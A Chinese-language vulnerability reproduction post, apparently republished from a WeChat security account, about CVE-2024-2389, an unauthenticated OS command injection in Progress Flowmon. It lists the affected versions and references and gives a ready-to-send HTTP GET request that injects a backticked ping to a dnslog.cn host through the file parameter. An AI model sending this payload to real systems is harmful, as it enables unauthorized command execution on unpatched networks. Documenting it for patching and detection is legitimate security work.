本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Progress Software的Flowmon是一种网络监控和安全解决方案,可帮助企业和组织监控、分析和保护其网络。
官网地址:https://www.flowmon.com/
空间测绘
回复“20240418”获取空间测绘语句
漏洞描述
在 11.1.14 和 12.3.5 之前的 Flowmon 版本中,已发现操作系统命令注入漏洞。未经身份验证的用户可以通过 Flowmon 管理界面进入系统,从而执行任意系统命令。
影响版本
11.x < Progress Flowmon < 11.1.14
12.x < Progress Flowmon < 12.3.5
11.0之前的所有Flowmon版本(10.x 及更低版本)均不受此漏洞影响
漏洞利用
GET /service.pdfs/confluence?lang=en&file=`ping zg5amk.dnslog.cn` HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-2389
https://avd.aliyun.com/detail?id=AVD-2024-2389
https://github.com/adhikara13/CVE-2024-2389
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
回复“20240418”获取空间测绘语句
原文始发于微信公众号(不够安全):[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论